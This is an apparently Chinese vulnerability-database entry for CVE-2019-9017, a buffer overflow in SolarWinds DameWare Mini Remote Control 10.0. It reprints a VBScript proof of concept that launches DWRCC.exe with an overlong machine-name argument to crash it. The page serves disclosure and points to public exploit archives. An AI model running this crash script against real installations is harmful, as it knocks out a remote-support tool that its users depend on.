SolarWinds DameWare Mini Remote Control 10.0 Denial Of Service - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1594277 漏洞类型
发布时间 2019-05-04 更新时间 2019-05-04
CVE编号 CVE-2019-9017 CNNVD-ID N/A
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://cxsecurity.com/issue/WLB-2019050043
|漏洞详情
This vulnerability has been modified since it was last analyzed by the NVD. It is awaiting reanalysis which may result in further changes to the information provided.
|漏洞EXP
#Vendor:     Solarwinds
#Site Vendor:    https://www.dameware.com/
#Product:     Dameware Mini Remote Control
#Version:    10.0 x64
#Platform:    Windows
#Tested on:    Windows 7 SP1 x64
#Dscription:    The DWRCC executable file is affected by a buffer overflow vulnerability.
#The buffer size passed in on the machine name parameter is not checked
#Vector:    pass buffer to the machine host name parameter

#Author:    Dino Barlattani dinbar78@gmail.com
#Link:        http://www.binaryworld.it

#CVE ID:    CVE-2019-9017

#POC in VB Script

option explicit
dim fold,exe,buf,i,wsh,fso,result
exe = "DWRCC.exe"
fold = "C:\program files\SolarWinds\DameWare Mini Remote Control 10.0 x64
#1\"
for i = 0 to 300
    buf = buf & "A"
next
set wsh = createobject("wscript.shell")
set fso = createobject("scripting.filesystemobject")
if fso.folderexists(fold) then
    fold = fold & exe
    fold = chr(34) & fold & chr(34)
    result = wsh.run(fold & " -c: -h: -m:" & buf,0,true)
end if
|参考资料
resource:
hyperlink:http://packetstormsecurity.com/files/152721/SolarWinds-DameWare-Mini-Remote-Control-10.0-Denial-Of-Service.html
resource:Exploit
hyperlink:http://www.binaryworld.it/guidepoc.asp
resource:Exploit
hyperlink:https://www.exploit-db.com/exploits/46793/